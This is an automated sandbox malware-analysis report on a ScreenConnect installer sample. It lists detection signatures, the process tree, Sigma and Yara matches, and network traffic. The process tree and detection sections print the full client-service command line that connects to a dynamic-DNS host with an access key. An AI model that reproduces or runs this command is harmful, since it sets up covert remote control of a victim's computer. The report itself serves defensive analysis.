Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Support.ClientSetup.exe

Overview

General Information

Sample name:Support.ClientSetup.exe
Analysis ID:1568673
MD5:6b40938a0c9723db144782829b133286
SHA1:4e4e55175aa824d118f6cb20d6883a9c1d4d2a39
SHA256:f6f1bd1f20dc68a6adce415ddb8cc509cd4e1f5435e369467abdd70900000cc3
Infos:

Detection

ScreenConnect Tool
Score:50
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64_ra
  • Support.ClientSetup.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\Support.ClientSetup.exe" MD5: 6B40938A0C9723DB144782829B133286)
    • msiexec.exe (PID: 7036 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7072 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7116 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 6168 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 6340 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6196 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 6160 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 6504 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 6568 cmdline: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 3012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 5420 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 1916 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4264 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5752 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Support.ClientSetup.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF541DFE2B6D389D3F.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF5EA8DB2B84680E0B.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DF97FD4A0028A9EAFA.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DFB36FFE6B04D3445D.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 6 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.2.Support.ClientSetup.exe.5fc0000.7.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          9.2.ScreenConnect.WindowsClient.exe.2dafa18.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            9.0.ScreenConnect.WindowsClient.exe.8d0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.2.Support.ClientSetup.exe.5fc0000.7.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 4 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c=", ProcessId: 6160, ProcessName: ScreenConnect.ClientService.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (a9232c38f7080cfd) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7072, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-ABC2-B94479DC0550}\(Default)
                                  Sigma detected: Windows Processes Suspicious Parent Directory
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3012, ProcessName: svchost.exe

                                  Suricata Signatures

                                  No Suricata rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Multi AV Scanner detection for submitted file
                                  Source: Support.ClientSetup.exeReversingLabs: Detection: 22%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_048716F8 CryptProtectData,8_2_048716F8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_048716F1 CryptProtectData,8_2_048716F1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05D92D70 CryptUnprotectData,8_2_05D92D70
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05D92D68 CryptUnprotectData,8_2_05D92D68
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  EXE planting / hijacking vulnerabilities found
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeEXE: msiexec.exeJump to behavior
                                  Uses 32bit PE files
                                  Source: Support.ClientSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  PE / OLE file has a valid certificate
                                  Source: Support.ClientSetup.exeStatic PE information: certificate valid
                                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                                  Source: Support.ClientSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Binary contains paths to debug symbols
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Support.ClientSetup.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Support.ClientSetup.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1103254270.00000000000AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1083284190.0000000004CD0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Support.ClientSetup.exe, MSI837B.tmp.3.dr, 3b7ed6.rbs.3.dr, MSI8185.tmp.3.dr, 3b7ed7.msi.3.dr, MSI8195.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Support.ClientSetup.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Support.ClientSetup.exe, MSI7753.tmp.2.dr, 3b7ed7.msi.3.dr, ScreenConnect.ClientSetup.msi.0.dr, 3b7ed5.msi.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160153814.0000000001A12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2339021256.00000000031B7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Support.ClientSetup.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: d:
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: c:
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Enables network access during safeboot for specific services
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Uses dynamic DNS services
                                  Source: unknownDNS query: name: fmt2as.ddns.net
                                  Source: global trafficTCP traffic: 192.168.2.17:49707 -> 194.59.31.27:8041
                                  Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: fmt2as.ddns.net
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 0000000C.00000002.2323244715.0000027972E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
